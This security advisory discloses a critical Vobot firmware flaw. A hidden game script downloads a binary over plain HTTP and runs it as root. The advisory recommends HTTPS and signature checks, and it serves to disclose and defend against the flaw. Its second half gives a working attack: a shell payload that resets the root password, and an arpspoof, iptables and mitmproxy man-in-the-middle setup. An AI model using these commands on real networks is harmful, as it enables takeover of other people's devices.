6. February 2018 - Thomas Roth - firstname.lastname@example.org
CVS: 9.6 Critical
This vulnerability has been confirmed to be exploitable. The vulnerability will potentially be published after 60 days or after a patch for the vulnerability has been released.
It was found that the Vobot firmware has an easter-egg that starts a Breakout video game, which can be invoked by pressing the volume-down button the on back of the device for ca. 3 seconds. The shell script that implements this easter-egg (located in
/usr/sbin/game_breakout) uses the
wget utility to download the game from the URL
/tmp/breakout and executes it.
An attacker that conducts a man-in-the-middle attack can intercept the HTTP request and supply his own binary which is then executed with root permissions on the device.
The connection should at least use HTTPS (with certificate validation, see the CVE-2018-6827 vulnerability report). This soltuion will still pose an issue if the server (or the TLS connection) is compromised as no additional validation of the binary is done (e.g. a signature verification), as such it is recommended to do additional, digital signature based verification of all downloaded executables or firmware upgrades.
An attacker on the same network can conduct a man-in-the-middle attack using arp-spoofing. By then using a transparent proxy such as
mitmproxy it is possible to intercept and modify all requests to the different servers and the Vobot client.
The attacker can then replace the response of the HTTP request to
http://file.myvobot.com/plugin/game/breakout with a custom response, such as:
#!/bin/sh passwd << EOF test1234 test1234 EOF
This will set the root password of the device to test1234 which can be used by a network-local attacker to connect to the device using SSH (which is enabled by default, see CVE-2018-6826).
Example attack setup:
export VOBOT_IP=... # e.g. 192.168.0.5 export GATEWAY_IP=... # e.g. 192.168.0.1 export INTERFACE=... # e.g. wlan0 sysctl -w net.ipv4.ip_forward=1 iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080 iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080 # In separate terminals: arpspoof -i $INTERFACE -t $VOBOT_IP $GATEWAY_IP >/dev/null & arpspoof -i $INTERFACE -t $GATEWAY_IP $VOBOT_IP >/dev/null & mitmproxy -T --host